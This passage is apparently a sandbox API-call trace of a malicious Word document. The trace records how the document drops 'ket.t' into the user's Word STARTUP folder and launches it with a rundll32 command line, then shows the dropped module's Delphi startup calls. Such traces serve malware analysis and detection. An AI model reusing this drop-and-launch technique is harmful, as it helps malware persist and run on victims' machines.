[0133.440] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.440] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.441] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.441] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="~DFF68029CC5B15E534.TMP", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.441] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.441] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.441] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x0 [0133.441] FileSystemObject:IUnknown:Release (This=0x84a1f78) returned 0x0 [0133.441] FileSystemObject:IUnknown:Release (This=0x84a1fb8) returned 0x0 [0133.441] FileSystemObject:IUnknown:Release (This=0x3243974) returned 0x1 [0133.441] FileSystemObject:IUnknown:Release (This=0x3243974) returned 0x0 [0133.441] FileSystemObject:IUnknown:Release (This=0x84a1f08) returned 0x0 [0133.442] GetUserDefaultLCID () returned 0x409 [0133.443] VarBstrCmp (bstrLeft="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k", bstrRight="", lcid=0x409, dwFlags=0x30001) returned 0x2 [0133.443] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup", bstrRight="\\ket.t", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", cchWideChar=-1, lpMultiByteStr=0x1a7a0c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", lpUsedDefaultChar=0x0) returned 64 [0133.443] _fullpath (in: _FullPath=0x1a7c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t" [0133.443] _mbspbrk (_Str=0x1a7c48, _Control=0x6662fa5c) returned 0x0 [0133.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k", cchWideChar=-1, lpMultiByteStr=0x1a7a0c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k", lpUsedDefaultChar=0x0) returned 43 [0133.443] _fullpath (in: _FullPath=0x1a7b40, _Path="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k") returned="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k" [0133.443] _mbspbrk (_Str=0x1a7b40, _Control=0x6662fa5c) returned 0x0 [0133.459] VarBstrCat (in: bstrLeft="rundll32", bstrRight=".exe", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0133.459] VarBstrCat (in: bstrLeft="rundll32.exe", bstrRight=" ", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0133.460] VarBstrCat (in: bstrLeft="rundll32.exe ", bstrRight="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0133.460] VarBstrCat (in: bstrLeft="rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup", bstrRight="\\ket.t,EUAYKIYBPAX", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0133.460] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t,EUAYKIYBPAX", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1a7d14*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x2, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1a7d04 | out: lpCommandLine="rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t,EUAYKIYBPAX", lpProcessInformation=0x1a7d04*(hProcess=0x928, hThread=0x92c, dwProcessId=0xfcc, dwThreadId=0xfd0)) returned 1 [0134.974] GetLastError () returned 0x0 [0134.974] WaitForInputIdle (hProcess=0x928, dwMilliseconds=0x2710) returned 0x102 [0148.707] CloseHandle (hObject=0x92c) returned 1 [0148.707] CloseHandle (hObject=0x928) returned 1 [0148.708] GetAsyncKeyState (vKey=3) returned 0 Thread: id = 14 os_tid = 0xf14 Thread: id = 15 os_tid = 0xf4c Thread: id = 77 os_tid = 0xffc Thread: id = 108 os_tid = 0xb60 Thread: id = 109 os_tid = 0xb64 Thread: id = 110 os_tid = 0xb84 Thread: id = 122 os_tid = 0xe94 Thread: id = 123 os_tid = 0xe50 Thread: id = 125 os_tid = 0xebc Thread: id = 133 os_tid = 0xf08 Process: id = "2" image_name = "splwow64.exe" filename = "c:\\windows\\splwow64.exe" page_root = "0x354b0000" os_pid = "0xf7c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe80" cmd_line = "C:\\Windows\\splwow64.exe 8192" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e77f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0xf80 Thread: id = 17 os_tid = 0xf84 Thread: id = 18 os_tid = 0xf88 Thread: id = 19 os_tid = 0xf8c Thread: id = 20 os_tid = 0xf90 Thread: id = 21 os_tid = 0xf94 Thread: id = 22 os_tid = 0xf98 Thread: id = 115 os_tid = 0xd6c Thread: id = 120 os_tid = 0xe20 Thread: id = 132 os_tid = 0xde8 Thread: id = 137 os_tid = 0x40c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x79df4000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cfb4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 23 os_tid = 0xf44 Thread: id = 24 os_tid = 0x878 Thread: id = 25 os_tid = 0x874 Thread: id = 26 os_tid = 0x86c Thread: id = 27 os_tid = 0x6a4 Thread: id = 28 os_tid = 0x54c Thread: id = 29 os_tid = 0x3c8 Thread: id = 30 os_tid = 0x6bc Thread: id = 31 os_tid = 0x388 Thread: id = 32 os_tid = 0x340 Thread: id = 33 os_tid = 0x200 Thread: id = 34 os_tid = 0x1bc Thread: id = 35 os_tid = 0x154 Thread: id = 36 os_tid = 0x714 Thread: id = 37 os_tid = 0x2c4 Thread: id = 38 os_tid = 0x354 Thread: id = 39 os_tid = 0x5d0 Thread: id = 40 os_tid = 0x41c Thread: id = 41 os_tid = 0x430 Thread: id = 42 os_tid = 0x180 Thread: id = 43 os_tid = 0x77c Thread: id = 44 os_tid = 0x740 Thread: id = 45 os_tid = 0x6e8 Thread: id = 46 os_tid = 0x6e4 Thread: id = 47 os_tid = 0x6b8 Thread: id = 48 os_tid = 0x6a0 Thread: id = 49 os_tid = 0x684 Thread: id = 50 os_tid = 0x464 Thread: id = 51 os_tid = 0x450 Thread: id = 52 os_tid = 0x428 Thread: id = 53 os_tid = 0x424 Thread: id = 54 os_tid = 0x420 Thread: id = 55 os_tid = 0x418 Thread: id = 56 os_tid = 0x398 Thread: id = 57 os_tid = 0x394 Thread: id = 58 os_tid = 0x3f0 Thread: id = 59 os_tid = 0x3e8 Thread: id = 60 os_tid = 0x3dc Thread: id = 61 os_tid = 0x384 Thread: id = 62 os_tid = 0x37c Thread: id = 63 os_tid = 0x370 Thread: id = 64 os_tid = 0x368 Thread: id = 65 os_tid = 0xfa0 Thread: id = 66 os_tid = 0xfa4 Thread: id = 67 os_tid = 0xfa8 Thread: id = 68 os_tid = 0xfac Thread: id = 69 os_tid = 0xfb0 Thread: id = 70 os_tid = 0xfb4 Thread: id = 78 os_tid = 0xb1c Thread: id = 79 os_tid = 0xb20 Thread: id = 114 os_tid = 0xafc Thread: id = 116 os_tid = 0xd70 Thread: id = 117 os_tid = 0x43c Thread: id = 119 os_tid = 0xdfc Thread: id = 141 os_tid = 0x894 Thread: id = 142 os_tid = 0x89c Thread: id = 143 os_tid = 0xa28 Process: id = "4" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x3553d000" os_pid = "0xfcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe80" cmd_line = "rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t,EUAYKIYBPAX" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e77f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 71 os_tid = 0xfd0 [0136.550] LocalAlloc (uFlags=0x40, uBytes=0x40) returned 0x3eba58 [0136.550] GetKeyboardType (nTypeFlag=0) returned 4 [0136.550] GetCommandLineA () returned="rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t,EUAYKIYBPAX" [0136.550] GetStartupInfoA (in: lpStartupInfo=0x1af7d4 | out: lpStartupInfo=0x1af7d4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x2, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0136.550] GetVersion () returned 0x1db10106 [0136.550] GetVersion () returned 0x1db10106 [0136.551] GetCurrentThreadId () returned 0xfd0 [0136.551] GetModuleFileNameA (in: hModule=0x470000, lpFilename=0x1af2d0, nSize=0x105 | out: lpFilename="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t")) returned 0x3f [0136.551] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af1ab, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0136.551] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af2c0 | out: phkResult=0x1af2c0*=0x0) returned 0x2 [0136.551] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af2c0 | out: phkResult=0x1af2c0*=0x0) returned 0x2 [0136.552] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af2c0 | out: phkResult=0x1af2c0*=0x0) returned 0x2 [0136.552] lstrcpynA (in: lpString1=0x1af1ab, lpString2="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", iMaxLength=261 | out: lpString1="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t" [0136.552] GetThreadLocale () returned 0x409 [0136.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af2bb, cchData=5 | out: lpLCData="ENU") returned 4 [0136.553] lstrlenA (lpString="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t") returned 63 [0136.553] lstrcpynA (in: lpString1=0x1af1e9, lpString2="ENU", iMaxLength=199 | out: lpString1="ENU") returned="ENU" [0136.553] LoadLibraryExA (lpLibFileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0136.553] lstrcpynA (in: lpString1=0x1af1e9, lpString2="EN", iMaxLength=199 | out: lpString1="EN") returned="EN" [0136.553] LoadLibraryExA (lpLibFileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0136.553] LoadStringA (in: hInstance=0x470000, uID=0xffc7, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0136.553] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x3fabc8 [0136.553] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1ff0000 [0136.554] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x3dc9e8 [0136.554] VirtualAlloc (lpAddress=0x1ff0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ff0000 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffc6, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffc4, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffc5, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffd3, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffc0, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffd2, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffef, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffd6, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffd5, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe8, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe9, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffea, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe7, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe5, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe3, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe2, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe1, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffe0, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0136.554] LoadStringA (in: hInstance=0x470000, uID=0xffff, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfffe, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfffd, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfffc, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfffb, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfffa, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfff9, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfff8, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfff7, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfff6, lpBuffer=0x1af3f4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xfff4, lpBuffer=0x1af3e0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0136.555] LoadStringA (in: hInstance=0x470000, uID=0xffe4, lpBuffer=0x1af3e0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0136.555] GetVersionExA (in: lpVersionInformation=0x1af778*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x11cf2, dwMinorVersion=0x1af794, dwBuildNumber=0x76536b86, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1af778*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0136.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0136.555] GetProcAddress (hModule=0x75c50000, lpProcName="GetDiskFreeSpaceExA") returned 0x75ce434f [0136.555] GetThreadLocale () returned 0x409 [0136.555] GetThreadLocale () returned 0x409 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1af650, cchData=256 | out: lpLCData="Jan") returned 4 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1af650, cchData=256 | out: lpLCData="January") returned 8 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1af650, cchData=256 | out: lpLCData="Feb") returned 4 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1af650, cchData=256 | out: lpLCData="February") returned 9 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1af650, cchData=256 | out: lpLCData="Mar") returned 4 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1af650, cchData=256 | out: lpLCData="March") returned 6 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1af650, cchData=256 | out: lpLCData="Apr") returned 4 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1af650, cchData=256 | out: lpLCData="April") returned 6 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1af650, cchData=256 | out: lpLCData="May") returned 4 [0136.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1af650, cchData=256 | out: lpLCData="May") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1af650, cchData=256 | out: lpLCData="Jun") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1af650, cchData=256 | out: lpLCData="June") returned 5 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1af650, cchData=256 | out: lpLCData="Jul") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1af650, cchData=256 | out: lpLCData="July") returned 5 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1af650, cchData=256 | out: lpLCData="Aug") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1af650, cchData=256 | out: lpLCData="August") returned 7 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1af650, cchData=256 | out: lpLCData="Sep") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1af650, cchData=256 | out: lpLCData="September") returned 10 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1af650, cchData=256 | out: lpLCData="Oct") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1af650, cchData=256 | out: lpLCData="October") returned 8 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1af650, cchData=256 | out: lpLCData="Nov") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1af650, cchData=256 | out: lpLCData="November") returned 9 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1af650, cchData=256 | out: lpLCData="Dec") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1af650, cchData=256 | out: lpLCData="December") returned 9 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1af650, cchData=256 | out: lpLCData="Sun") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1af650, cchData=256 | out: lpLCData="Sunday") returned 7 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1af650, cchData=256 | out: lpLCData="Mon") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1af650, cchData=256 | out: lpLCData="Monday") returned 7 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1af650, cchData=256 | out: lpLCData="Tue") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1af650, cchData=256 | out: lpLCData="Tuesday") returned 8 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1af650, cchData=256 | out: lpLCData="Wed") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1af650, cchData=256 | out: lpLCData="Wednesday") returned 10 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1af650, cchData=256 | out: lpLCData="Thu") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1af650, cchData=256 | out: lpLCData="Thursday") returned 9 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1af650, cchData=256 | out: lpLCData="Fri") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1af650, cchData=256 | out: lpLCData="Friday") returned 7 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1af650, cchData=256 | out: lpLCData="Sat") returned 4 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1af650, cchData=256 | out: lpLCData="Saturday") returned 9 [0136.556] GetThreadLocale () returned 0x409 [0136.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1af6ac, cchData=256 | out: lpLCData="$") returned 2 [0136.556] GetLocaleInfoA (in: Locale=0x409, 